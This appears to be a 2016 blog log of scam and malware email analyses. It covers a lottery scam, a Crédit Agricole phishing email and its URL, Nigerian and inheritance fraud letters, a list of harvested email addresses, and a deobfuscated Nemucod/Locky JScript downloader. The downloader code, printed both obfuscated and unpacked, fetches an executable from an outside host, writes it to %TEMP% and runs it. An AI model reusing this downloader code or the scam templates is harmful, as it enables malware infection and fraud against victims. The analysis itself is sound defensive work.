Monday, May 9, 2016

Winner of the Coca Cola lottery

Dear sir,

This is to notify you that your name was picked from THIS SITE by the Coca Cola Company as one of the lucky winner of $2,000,000.00 Usd in (Coca Cola) Profile Award 2016 so you are advice to contact (Coca Cola) Profile Award agent for receiving of your wining price. Agent to contact Mr. Confidence Roland, via email address

Below is the information needed

1. Full Name:
2. Address:
3. Sex:
4. Occupation:
5. Phone Number:
6. City
7. Country:
8. Age:
9. A Copy of Your ID card (attached)

Kindly contact the agent In-charge of your winnings, Mr. Confidence Roland , through his email address,{gmail.com}
Once again,

CONGRATULATIONS

Email analysis :

NOTE : mascogold@gmail.com

Nouveau message disponible ! (Phishing Crédit Agricole)

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Cher(e) Client(e),
Un conseiller du Crédit Agricole vous a adressé un message.
Vous pourriez le consulter en accédant à votre compte client en ligne à l'aide
De votre identifiant/mot de passe en cliquant sur le lien ci-dessous :

Cliquez ICI Pour accéder à votre compte.

A très bientôt sur le service de gestion de comptes.
Crédit Agricole

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Cher(e) Client(e),
Un conseiller du Crédit Agricole vous a adressé un message.
Vous pourriez le consulter en accédant à votre compte client en ligne à l'aide
De votre identifiant/mot de passe en cliquant sur le lien ci-dessous :

Cliquez ICI Pour accéder à votre compte.

A très bientôt sur le service de gestion de comptes.
Crédit Agricole

Phishing analysis :

CLICK : Cliquez ICI
OPEN : http://sf-g50-enligne.crdit-agricole.chaletbnb.com/sfsecure/enligne/
SCREENSHOT :


CLICK : CONFIRMER
REDIRECT : https://www.credit-agricole.fr/

Email analysis :

NOTE : pokleksa@aseame.onmicrosoft.com
NOTE : chounettte@hotmail.fr
NOTE : X-Originating-Ip : [81.193.66.163]

Virus Analysis (UNPACKED...)

In the last email, I obtained a virus similar to a Nemucod ransomware from the virus report...


Code analysis :

===================================
INIT
===================================

var PR_RDONLY = 0x01;
var PR_WRONLY = 0x02;
var PR_RDWR = 0x04;
var PR_CREATE_FILE = 0x08;
var PR_APPEND = 0x10;
var PR_TRUNCATE = 0x20;
var PR_SYNC = 0x40;
var PR_EXCL = 0x80;

GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

function hex_md5_stream(stream) {
var hasher = Components.classes["@mozilla.org/security/hash;1"]
.createInstance(Components.interfaces.nsICryptoHash);
hasher.init(hasher.MD5);
hasher.updateFromStream(stream, stream.available());
var hash = hasher.finish(false);
var ret = '';
for (var i = 0; i < hash.length; ++i) { var hexChar = hash.charCodeAt(i).toString(16); if (hexChar.length == 1) ret += '0'; ret += hexChar; } return ret; }


===================================
FUNCTION PICK
===================================

function pick(){
for (var i = 0, l = arguments.length; i < l; i++){ if (arguments[i] != undefined) return arguments[i]; } return null; };


===================================
FUNCTION BASE64DECODE
===================================

this.decode = base64decode;
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
this.chars();
function base64decode( str ) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while(i < len) { /* c1 */ do { c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c1 == -1); if(c1 == -1) break; /* c2 */ do { c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff]; } while(i < len && c2 == -1); if(c2 == -1) break; out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if(c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while(i < len && c3 == -1); if(c3 == -1) break; out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if(c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while(i < len && c4 == -1); if(c4 == -1) break; out += String.fromCharCode(((c3 & 0x03) << 6) | c4); } return out; }


===================================
Calling Windows Script Host
===================================

try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
}catch(Eeed)
{

}


===================================
FUNCTION
===================================

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase(); if (this.length==7) color = this.toLowerCase(); } } return (color.length==7 ? color : (arguments[0] || this)); };


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

function hex_md5(s) {
var stream = Components.classes["@mozilla.org/io/string-input-stream;1"]
.createInstance(Components.interfaces.nsIStringInputStream);
stream.setData(s, s.length);
return hex_md5_stream(stream);
}


===================================
DATAS
===================================

titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
if(thenDo){
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
var empty=Math.random();
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

var hoddor = "lovesanimals.c"+"om/09y8hb7v6y7g";

===================================
FUNCTION QUICKWITTED
===================================

function quickwitted(expulsion, proved) {
try {
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
if (empty > 0) {
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|separated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

if(NBHAYvL.status==200)
{
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
OkUvN.type=0+3-2;
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

} catch (rzupeJz) { };
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
}
saloHood();
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64

DOCUMENT DE NON CONFORMITE (Virus)

Ci-joint le document de non conformité.

Bien � toi,
--



SCopieur VA9812357665355478.gz

Virus analysis :

SHA256 : 0235a1aded1737d8c89186b29a34610be835ff45f896091d6dcd6eb9a3152061
Filename : SCopieur VA9812357665355478.gz

ALYac : JS:Trojan.JS.Downloader.IQ
AVG : JS/Downloader.Agent
Ad-Aware : JS:Trojan.JS.Downloader.IQ
Arcabit : JS:Trojan.JS.Downloader.IQ
Avast : JS:Downloader-CZW [Trj]
Avira (no cloud) : JS/Dldr.Locky.98765
BitDefender : JS:Trojan.JS.Downloader.IQ
CAT-QuickHeal : JS.Locky.P
Cyren : JS/Locky.AC
DrWeb : JS.DownLoader.1397
ESET-NOD32 : JS/TrojanDownloader.Nemucod.WU
F-Prot : JS/Locky.AC
F-Secure : JS:Trojan.JS.Downloader.IQ
Fortinet : JS/Nemucod.WU!tr.dldr
GData : JS:Trojan.JS.Downloader.IQ
Ikarus : Trojan-Ransom.Script.Locky
Kaspersky : Trojan-Downloader.JS.Agent.kee
McAfee : JS/Nemucod.is
McAfee-GW-Edition : JS/Nemucod.is
eScan : JS:Trojan.JS.Downloader.IQ
Microsoft : TrojanDownloader:JS/Nemucod.EK
Rising : Downloader.Ransomware!8.625A-SOAAbihlG7H (Cloud)
Sophos : JS/Dldr-MD

Email analysis :

NOTE : lg46@valoritech.fr
NOTE : User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.7.0
NOTE : Received : from cmodem.201.140.226-163.wirenet.com.ar (unknown [201.140.226.163])

Godwin Emefiele

IMMEDIATE CONTRACT PAYMENT
CONTRACT #:MAV/NNPC/FGN/MIN/0015

From the records of outstanding contractors due for payment with the federal government of Nigeria. Your name and company was discovered as next on the list of the outstanding contractors who have not received their payments. I wish to inform you that your payment is being processed and will be released to you as soon as you respond to this letter. Also note that from my records your outstanding contract payment is US$15.9 Million Dollars. Please re-confirm to me if this is in line with what you have in your records and also re-confirm to me the following.

1) Your full name.
2) Telephone and fax number, if possible include you mobile telephone number.
3) Company name, position and address.
4) Profession, age and marital status.

As soon as this information is received, your payment will be made to you in a certified bank draft from the central bank of Nigeria and a copy will be given to you to take to your bank for confirmation. Please get back to us with the below email address:godwinemefiele@writeme.com

Regards,

Mr. Godwin Emefiele.

Email leaks :

godwinemefiele@writeme.com, DeberX@savebabies.net, Dr.ivorbigone@yahoo.co.uk, Dr_obaze.cure@yahoo.com, DrewPWiener2010@gmail.com, ELLASANCHEZ1809@gmail.com, ERROL_RODMAN@HOTMAIL.COM, Eatme95@Lycos.com, Edokuspiritualspelltemple@hotmail.c, Edokuspiritualspelltemple@HOTMAIL.COM, Ehicarespellhelp@gmail.com, Elitemobhackers@yahoo.com, EnloeMauicibre@HOTMAIL.COM, Erigospellcaster@gmail.com, FRANK@yahoo.com, FannyPlunge23@gmail.com, Fightagainstfascism@gmail.com, Fishhsif1962@aol.com, GOCHEZ25@MYWAY.COM, GUYMANMUGU@yahoo.com, Gert@metr.uk, Hosenas12@yahoo.com, IanDanielSmith@gmail.com, Ibe_Gettin@firehousemail.com, Igbalutempleofsolution1@gmail.com, Ivar.Knutsen@mimer.no, Ivorstiffun40@gmail.com, JMN2MIZZOU@aol.com, JOHN_REGAN_2000@yahoo.com, JRapallo@gmail.com, JSRGoldberg@gmail.com, Jake.Crowen@HOTMAIL.COM, Jason20906@yahoo.com, Jcsmbar@prysm.net, Jeff@softdisk.com, Joe.dumass1@gmail.com, Jonasarschfick@hushmail.com, Jonstonejames@gmail.com, Jose.Heleon@gmail.com, LELE75067@yahoo.com

Email analysis :

NOTE : godwin009@y28mail.com
NOTE : Received : from [185.56.137.14] by www.y28mail.com via HTTP;

QUE DIEU VOUS BÉNISSE

Bonjour bien aimé en Christ

J'ai pu vous contacter lors d'une petite balade dans mes moments perdus sur Internet suite à mes recherches , d'où j'ai trouvé votre expertise qui me permet de vous contacter de sorte. Je vous ai donc choisi par volonté de DIEU et non par simple hasard. Mon état de santé étant dégradé, j'envisage de vous faire donation de ma fortune de 2.500.000 € à la Banque Of Africa Bénin(BOA-BENIN) en Afrique de l'OUEST afin que vous puissiez réaliser des projets humanitaires (aide aux personnes vulnérables telles que: les enfants de la rue, les orphelins, les démunies sans-abri etc...)J'ai le cœur serein vu que je suis touchée par une maladie qui ne cesse de dégrader ma vie depuis près de trois ans dont je suis actuellement en sous observation médicale à Londres en Angleterre. Selon le Docteur la boule de sang qui s'est installée dans le cerveau est à un niveau très avancé et donc toute intervention chirurgicale serait un échec à l'avance. J'ai peur que le reste de mon argent soit un gâchis après mon décès. J'ai donc pris la décision d'arrêter le traitement. Veuillez me contactez directement dans mon mail: ginettebourgeois1948@gmail.com

QUE DIEU VOUS BÉNISSE
En attente de vous relire

Cordialement

Ginette Bourgeois

Email analysis :

NOTE : ginettebourgeois1948@gmail.com
NOTE : june_june0822@zeus.eonet.ne.jp
NOTE : X-Originating-Ip : [::ffff:41.86.234.171]


NOTE : Mime-Version : 1.0
NOTE : X-Mailer : Zimbra Mailer (ZimbraWebClient - GC50 (Win)/0.0)
NOTE : Received : from mta02.eonet.ne.jp (mta02.eonet.ne.jp. [2001:ce8:0:603::48])
NOTE : Received : from mailmbsb1mc4.mozu.eo.k-opti.ad.jp (mbs07.eonet.ne.jp [60.56.6.205])


NOTE : by mailauthmsa11.mozu.eo.k-opti.ad.jp
NOTE : QUE DIEU VOUS BÉNISSE